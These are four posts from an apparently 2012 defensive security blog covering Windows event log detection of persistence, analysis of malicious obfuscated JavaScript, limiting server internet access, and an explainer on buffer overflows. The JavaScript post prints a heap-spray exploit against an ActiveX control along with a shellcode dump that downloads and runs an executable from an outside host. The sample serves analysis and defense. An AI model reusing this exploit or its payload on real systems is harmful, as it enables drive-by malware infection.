Thursday, November 22, 2012

Identifying Compromise with the Windows Event Log

Windows event logs are primarily viewed a means to confirm a compromise and explore the depth and width of a compromise. Typically, only after having been alerted by IDS, HIDS, or AV will an incident responder examine host event logs. Until recent changes in Vista & Server 2K8, this information could be seen as unmanageable and unruly. Today, I'm advocating for the use of Windows Event Logs as a source for initial identification of security incidents, instead of an after thought.

Detecting Persistence
I'm part of team whose role is to perform penetration tests and design mitigative strategies based on our ability to break in, persist, and move laterally. Most of the time, when we land on a machine inside of the target network, we utilize some form of persistence mechanism:

  1. Add a registry setting to HKLM/.../Run or RunOnce
  2. Attempt to create a service which runs our trojan
  3. Add a task in TaskScheduler to execute our trojan
  4. Open the Windows Firewall, enable Remote Desktop/ Remote Assistance, and add a user
  5. Copy our trojan into the "Auto-Start" directory
Let's take a moment and analyse how each of the above actions is captured in the Windows Event Logs (thank you Randy Franklin):
  1. Event 4657: Registry Changes
  2. Event 4697: Service installed on a system
  3. Event 4698: A Scheduled Task was created
  4. Event 4964: Firewall Exception Added, Event 4720: User Created
  5. Event 4657: This action will trigger registry changes in the Run hive
Now, let's not get carried away! I mean, Windows registry changes happen A LOT on end user workstations. Looking at all of the registry changes as potential compromises would be like documenting each port scan of your external IP space - not helpful. With this in mind, we need to filter for changes to specific hives which should generally remain static. We can also watch out for changes to any of the hives examined by "AutoRuns.exe"; a tool created by Mark Russinovich to identify persistent applications in Windows. 

Getting the Logs Together
Let's talk about the bigger challenge: collecting events from EACH workstation in a domain into a central location. There are a few approaches that would work, some more scalable than others. Your organizations bottom line will dictate what type solution you can implement, but just collecting key events centrally is a step in the right direction. If your organization has hardware sitting around, you can implement the first 2 solutions for free (plus labor):

  • Powershell or WMI: pull specific events
    • Easy, quick, could provide spotty data depending on pull frequency
  • Event Log Forwarding: push events to central log management device
    • Built into Windows, manageable via GPO, almost real-time, encryptable
  • Splunk or Snare agent: push events to central log management device
    • Optimal, real-time, encryptable, relatively expensive 

Not Just for Persistence!
Other uses of event logs included, but are not limited to:
  • Suspicious Share usage (think pass-the-hash/psexec.exe)
  • Local administrative account creation
  • Local administrator brute force attempts
  • Use of "net" tools on non-network admin boxes
  • Suspicious internal RDP sessions

Log management is certainly not a catch all. Attackers can and will find ways to compromise networks that will go undetected by event log monitoring. Event log monitoring should be view as a essential compromise detection component of a defense-in-depth approach to network security. That being said, for an attacker to persist on a Windows machine, it is extremely likely that they will trigger an event listed above.

Thursday, November 15, 2012

Malicious JavaScript

Often times, malware enters your network through your clients.  One of the most prevalent attack vectors is through browser vulnerabilities.  These are usually manifested in malicious JavaScript that aims to either redirect the browser to malicious website that is hosting exploit code or an exploit itself.  The Blackhole Exploit Kit has been making the news and flooding non-malicious but exploitable websites with redirect code through obfuscated JavaScript that will cause your web browser to be redirected through a series of other websites that determine your software versions and serve you the appropriate exploit for your system.  This is all automated and can be deployed by non-technical attackers.  

But what does "obfuscated" really mean?  For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated.  As a network defender, I've encountered my share of obfuscated JavaScript.  It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietor code, etc).  This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.

There is no real substitute to experience.  If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it.  Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious.  But, we can start with the easy ones.

Yahoo and Google make up a lot of the JavaScript code out there.  jQuery, undoubtedly one of the more popular JavaScript frameworks is served straight from Google.  Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons.  Saving bandwidth and automatic updating are just some of the reasons.  Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI).  JavaScript that is served by Yahoo and Google can generally be trusted.  After reviewing several samples over the wire, it becomes easy to see the patterns.

But it is important to know that exploit kits such the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites.  BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks.  It tends to consume only a few, albeit long, lines of code and usually has large amount of what appear to be meaningless numbers or letters followed by a decoding sequence.  I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to it.

In short, trust some sources, but not the frameworks.

JavaScript that redirects will usually go through several layers of obfuscation.  The structure generally tends to look like this:

Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code

The last line, execution code, described JavaScript execution, such as "eval" or some obfuscated version of it.  As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.

Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:


JavaScript exploits are usually Heap Spray attacks.  They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload.  There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload.  Note that this does not mean the code is not obfuscated.  It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself.  In other words, it will stick out.  

NOP (Null OPeration) is an assembly command that does nothing.  If an attacker has placed his payload, which contains assembly commands, in memory, but is not sure exactly where it is in memory, she may pad the beginning of the payload with NOP commands (0x90) so if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP commands until it hits the main payload.  This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.

Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:

function second()

        var yuwergufiudf = 0x0F0F0F0F;
        var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB
        var uyywifssdfdsf = 0x400000;
        var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2;
        var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38);
        var erwfrhhrhfg = unescape("%u0D0D%u0D0D");
        erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize);
        iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf;
        memory = new Array();
        for (i=0;i<iusdiuiudfsd;i++)
                memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf;
        var target = new ActiveXObject("DirectAnimation.PathControl");
        target.KeyFrame(0x40000E0A, new Array(1), new Array(1));

The lovely thing about scripting languages is that they execute regardless of the environment.  Unlike executable malware analysis, you can take Javascript code and run it in any environment and it will run, as long as certain dependencies are met.  Luckily, there are a lot of tools available for doing just this.  One of my favorite is called Malzilla (  Malzilla is a Windows based tool that can not only execute Javascript, it can also re-format, debug and analyze the resulting "stuff" that it generates.

Let's take the first example above of redirecting JavaScript.  First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla.  Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button.  This will give us something more readable.



We can do a quick review of the code in this script and identify the logic structures.  The "if" statement starting on the third line will execute if it is in a browser environment and it also does a little math test as an additional test.  We can change the code a little to ferret out what we really want to find out: what is this code trying to do?  Also, the "for" loop in the bottom is a decoding loop, building the variable "s".  Finally, the last line is actually an "eval" against the "z" variable, which is a copy of "s", done in the second to last line.  Finally, we can change the last "eval" to a "document.write":



When we run this, we find code that will redirect the web browser to http[:]//", which when this code was captured was a starting point for a Blackhole Exploit Kit (BEK) attack.

Now, let's look at the second example we have: a direct JavaScript exploit.  Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated.  I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack.  So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.

In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script.  A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample).  But let's focus on the payload to figure out what an infected system would do:


For this, we can use a variety of tools or even scripting.  The key point to remember is that this is machine code and is intended to be run directly in memory by redirecting EIP to the NOP sled in the beginning and then execute the rest of instructions.  Another thing to remember is that JavaScript uses a least significant bit (LSB) unicode format, which for our purposes means that we swap the byte pairs (i.e. change u3574 to u7435).  You can do this in your favorite scripting language.  You can also use Malzilla's "Misc Decoders" tab for this.  Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):

awk 'gsub("%u"," ") { x=1; while(x<=NF) { printf "0x" substr($x,3,2) ",0x" substr($x,1,2) ","; x++; } }'

In any case, you should have something like this in the end:


Now, you can convert the hex strings to binary in any number of ways.  Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):

xxd -r -ps /tmp/payload.hex | hexdump -Cv

The output should look like this:

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 eb 54 8b 75  3c 8b 74 35 78 03 f5 56  |.....T.u<.t5x..V|
00000020  8b 76 20 03 f5 33 c9 49  41 ad 33 db 36 0f be 14  |.v ..3.IA.3.6...|
00000030  28 38 f2 74 08 c1 cb 0d  03 da 40 eb ef 3b df 75  |(8.t......@..;.u|
00000040  e7 5e 8b 5e 24 03 dd 66  8b 0c 4b 8b 5e 1c 03 dd  |.^.^$..f..K.^...|
00000050  8b 04 8b 03 c5 c3 75 72  6c 6d 6f 6e 2e 64 6c 6c  |......urlmon.dll|
00000060  00 43 3a 5c 55 2e 65 78  65 00 33 c0 64 03 40 30  |.C:\U.exe.3.d.@0|
00000070  78 0c 8b 40 0c 8b 70 1c  ad 8b 40 08 eb 09 8b 40  |x..@..p...@....@|
00000080  34 8d 40 7c 8b 40 3c 95  bf 8e 4e 0e ec e8 84 ff  |4.@|.@<...N.....|
00000090  ff ff 83 ec 04 83 2c 24  3c ff d0 95 50 bf 36 1a  |......,$<...P.6.|
000000a0  2f 70 e8 6f ff ff ff 8b  54 24 fc 8d 52 ba 33 db  |/p.o....T$..R.3.|
000000b0  53 53 52 eb 24 53 ff d0  5d bf 98 fe 8a 0e e8 53  |SSR.$S..]......S|
000000c0  ff ff ff 83 ec 04 83 2c  24 62 ff d0 bf 7e d8 e2  |.......,$b...~..|
000000d0  73 e8 40 ff ff ff 52 ff  d0 e8 d7 ff ff ff 68 74  ||
000000e0  74 70 3a 2f 2f 6d 70 33  2e 72 65 61 6c 69 7a 65  |tp://mp3.realize|
000000f0  2e 68 6b 2f 6c 6f 67 69  6e 2f 69 6e 64 65 78 2e  |.hk/login/index.|

After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download: 
  • urlmon.dll
  • C:\U.exe
  • http[:]//

When you can quickly produce these types of results to your network defenders, it goes a long way to detecting and preventing infections on your network.  

Thanks for reading and hopefully you've found this post informative.  If there are topics you would like to see in the future, please drop us a line.

Thursday, November 8, 2012

Restricting Server Internet Access

It should be a no-brainer not to do this, but you'd be amazed at how many different environments I've worked in where the security/networking staff would allow their servers to talk outbound using HTTP/HTTPS.  While there are some occasions where this is necessary, it should certainly be limited to only the critical functions and requisite URLs/IP addresses.  Allowing servers to access the Internet can have potentially dangerous consequences resulting in loss of data confidentiality, integrity and availability. 

Circumstances where a server might need to get out to the Internet include anti-virus updates, operating system patches an 3rd party application updates such as from Adobe or Java.  These processes should be configured to funnel their traffic through "bridgehead servers"  that function for this purpose.  Microsoft provides WSUS (Windows Server Update Services) that can be used as a centralized point for providing updates not only to your clients, but your servers as well.  Additionally, McAfee, Symantec, and the other AV virus vendors generally provide the ability to allow just one device to go to the Internet and get the updates for distribution amongst the rest of your environment.  While this provides efficiency and in some cases a centralized reporting structure for your client devices, it should be viewed as a necessity for servers.  So, use your proxy server or your firewall to only allow the connections from the boxes that are acting as bridgeheads to the corresponding service provider on the Internet and be done with it.  While it is not impossible for Microsoft or any of the others to be compromised, the chances are pretty low and it is a risk worth taking. 

As I've mentioned in my previous posts, it is critical that we as network/security engineers try to eliminate as much unneeded traffic as possible, thus providing ourselves the ability to more closely examine the traffic that is allowed.  Also, getting back to the point of servers specifically, with bridgehead servers for critical update functions, we can deny all outbound web traffic from our server farm, thus potentially eliminating any C2 channels. If you have a Blue Coat or other brand of web filtering proxy, you can even use the builitin categories or create your own that can include the necessary sites to allow our software to remain updated.  Additionally, it will prevent administrators from surfing the web from servers.  Again, it was amazing to see environments where system admins would login to servers and check their webmail or go to any number of sites that they should not be viewing from a server.  Chances are when logged onto servers, the account will have elevated credentials thus giving any infection a more significant impact.   With no ability to get to the Internet, the server is better protected against infection and if somehow infected has a decreased likelihood of allowing C2 to an attacker, both effects we should strive for as security professionals. 

Thursday, November 1, 2012

Regarding Buffer Overflows

In the network security world, vulnerabilities and exploits are currency.  Without vulnerabilities, there would be no exploits.  Without exploits, there would be no network attacks.  Exploits can come in many forms and recently, the user has been the vulnerability: poor password security, phishing emails and other social engineering attacks have become more prevalent.  This is due to hardened network defenses, increased patching and the general lack of new exploitable software vulnerabilities.  Years ago, a system could be taken over by simply sending a network packet or two to the target system from halfway around the world.  But how did that happen?  What is different now?  

Today, there is more awareness of Buffer Overflows in the development world.  This, along with technical enhancements such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) and Stack Canaries (that shut down programs that misbehave) limits the impact of this vulnerability.  But there are always workarounds and it is essentially an arms race between the attackers and defenders.  Fundamentally, Buffer Overflows are still a problem, but it's not as easy as it once was.

This post aims to describe Buffer Overflow vulnerabilities in simple terms as well as provide a real world example.  It's not an easy task, mainly because of the technical details, but let's try anyway.

An overflow is what it sounds like: too much of something that doesn't fit in a container will overflow.  In programming terms, these are typically stack overflows or heap overflows.  The main difference is where in memory this overflow happens.  When a program needs to take in information, it allocates memory of a size that the programmer has specified and attempts to write data to that memory space.  If the amount of data written is larger than the space provided, an overflow occurs.  When this happens, other parts of memory are overwritten, which may or may not cause problems, but typically they will overwrite something important, causing memory corruption.  When the running program tries to read from that part of memory, it usually crashes.  

An attacker, after discovering that a program has a buffer overflow problem, can customize the data corruption in an attempt to control the crash.  Controlling the crash will allow the attacker to control the system.

How does an attacker control the crash?  By controlling EIP.  To illustrate this, we will demonstrate a stack buffer overflow and a simple, imaginary program:

C:\TEMP>hello.exe Mike
Hi there, Mike!

The imaginary program above, when run, will print out the words "Hi there, " followed by whatever what given as an argument to the program.  In this case, the name "Mike".  This is then followed by an exclamation point and a new line.  The program then exits.

The program looks like this at an extremely high level:

Create Name Variable (4 bytes);
Read Name from Command Line;
Print "Hi there, " + Name + "!\n";

When the program starts, it will allocate memory space for the Name variable.  In our example, let's say it allocates 4 bytes.  If we then provide a longer name like "Emily", with 5 characters, when the program reads "Emily" and tries to put it into the Name variable, we have an overflow.  Then we may get a nice little program crash. (For the purposes of this post, I won't go into details like the NULL or CRLF characters at the end of the input string).

Even a simple program like above will use almost 50 lines of CPU instructions.  Any function calls, like the Print command, can easily add to the number of instructions that a program needs.  You can imagine how many instructions are needed for more useful programs.  Luckily, today's processors can execute hundreds of billions of instructions a second, although even those seem slow at times.  

So where does EIP come in?  EIP exists in a special part of memory, called a register, that contains the memory address of the next instruction to execute.  After an instruction executes, EIP is changed to the memory address of the next instruction to run.  Essentially, EIP is where the CPU looks for the next thing to do.

There is another part of memory called the "stack."  This is where programs can store temporary information for use later (like "Mike" or "Emily").  In the example above, the second instruction uses a function to read user input into the Name variable.  In this case, let's pretend that the function used to write to the name variable is "strcpy" (a common function to copy strings - String Copy), which has its instructions in memory address 0x08048.  When the CPU gets to this part of the program, it will call that function using a jump (JMP) instruction.  But before it does that, it copies the address of the next instruction into the stack so it knows where to go back to when it's done.  So at a high level, this program looks like:

0x00001: Create Name
0x00005: strcpy (0x08048) Name from Command Line
0x00008: Print (printf, located at 0x080a9) "Hi there," + Name + "!\n"
0x0000a: exit

When our hello.exe program runs, the CPU executes the instructions at memory address 0x00001.  The next line of code is at memory address 0x00005.  The CPU then changes EIP to 0x00005. Then 0x00005 is executed, but since it points to another memory location outside of the normal execution, the address 0x00008 is written to the stack as a sort of bookmark for where to go back to when the strcpy function is completed.  The command "JMP 0x08048" is then executed.  EIP is changed to 0x08048.  Execution begins at 0x08048 until it is done.  When it is complete, the CPU instruction "RET" (short for return) is executed.  This tells the CPU to take the last value written to the stack, in this case 0x00008 and then copy that to EIP.  The CPU then continues execution from 0x00008.

Command execution is then:

0x00005 (JMP to 0x08048, copy 0x00008 to the stack)
RET (copy top of stack (0x00008) to EIP)
0x00008 (JMP to 0x080a9, copy 0x0000a to the stack)
RET (copy top of stack (0x0000a) to EIP)

In our example, we used "Emily" as the Name.  Now, since the Name only has 4 bytes, when "Emily" is written to memory, the last letter "y" (0x79) is written past the 4 bytes.  What is past the 4 bytes?  Who knows?  Noone really, at first.  But one thing about computers is that they are consistent.  The memory structures are the same every time a program is run.  If the overflow goes into the area of the stack where something important is written, say the address to return to (0x00008), when the strcpy function is done and RET is executed, the CPU will try to copy 0x00008 into EIP, except in this case, it's been changed to 0x79008.  The CPU will copy that into EIP and then try to execute the instructions at 0x79008, which is likely garbage and the CPU will error out with "illegal instruction at 0x79008."

On the next run, an attacker could then simply change "Emily" into different values that means something, causing EIP to point to a part of memory the attacker controls.  Remember that an overflow is continuously written to memory.  If we used a very long name instead of Emily, the name we chose will be in memory.  Whole swaths of memory will be overwritten.  Since the attacker can now control EIP, they can simply change it to the memory address of instructions other than the normal ones and then now the attacker has owned your system.

If you want to see this in the real world, fire up an old Windows XP system.  There is a command line program built-in called "netsetup.exe".  If you have a newer system, you can still try this, but it's been patched sometime since Windows XP, so your mileage will vary.  In any case, it's still worth seeing the process in action.  Note that Windows 7 does not have netsetup.exe.

Step 1: Open a command line prompt by running "cmd.exe"
Step 2: Run the program netsetup.exe (it's in the PATH, so you can run it from anywhere).
Step 3: Give netsetup.exe an argument of AAAA:

C:\TEMP>netsetup.exe AAAA

You will get a box that says "Command Line Syntax Error"

Step 4: Add more AAAAs until you get a program crash (hint: it starts to crash at 271 characters).  


If you examine the technical details of the crash, you should find that one of the registers (Windows calls it "P7") has a value of 41414141.  A capital "A" has a hex value of 0x41.  What you are seeing is EIP with a value of 0x41414141, which caused the program to crash because it tried to execute instructions at that memory address.  If you change the letters at the end of your 271 characters to say ABCD, you will see P7 change to something like 44434241.  You are now controlling EIP.

At this point, one could then fire up a debugger and examine memory when the program crashes and find out where the rest of the "AAAAAA"s went in memory, attempt to change the "AAAAAA"s to actual instructions and then modify the last part to point to where the attacker's instructions are in memory.  

The series of characters that make up the attacker's instructions (usually minimal code to give the attacker some level of control) is called the payload.  The coding problem of netsetup.exe that allows memory to be overwritten is called a vulnerability.  If the attacker can actually run his own code against this vulnerability, this would be an exploitable vulnerability.  If not and all she can do is crash the program, it's still a vulnerability but not exploitable.

Since netsetup.exe is a really old program, this is not really a vulnerability disclosure.  I do not know if netsetup is fully exploitable or not.  This would require local execution since netsetup.exe is not a networked program and the input to the program comes from the command line.  But the process for finding vulnerabilities in network-aware programs is the same: keep feeding it garbage and wait for it to crash.  When it crashes, examine memory and see if there is some kind of overflow involved and if as an attacker, you can craft input to the program via network packets, that would give you control of EIP.  "Fuzzing" programs (like this one) automate a lot of this manual process by heaping varying amounts and types of data at a program and then records the crashes.  Vulnerability hunters generally write their own fuzzers to help with this.  Finally, it is important to point out that these are really simple examples.  There is a lot more involved in vulnerability hunting and exploitation, but this is the gist of it.

Hopefully this gives some clarity to some of the terms that are thrown around in the network security world as opposed to adding to the confusion.  In future posts, we'll examine process spawning and the different types of exploits (local, remote, privilege escalation).  Thanks for reading!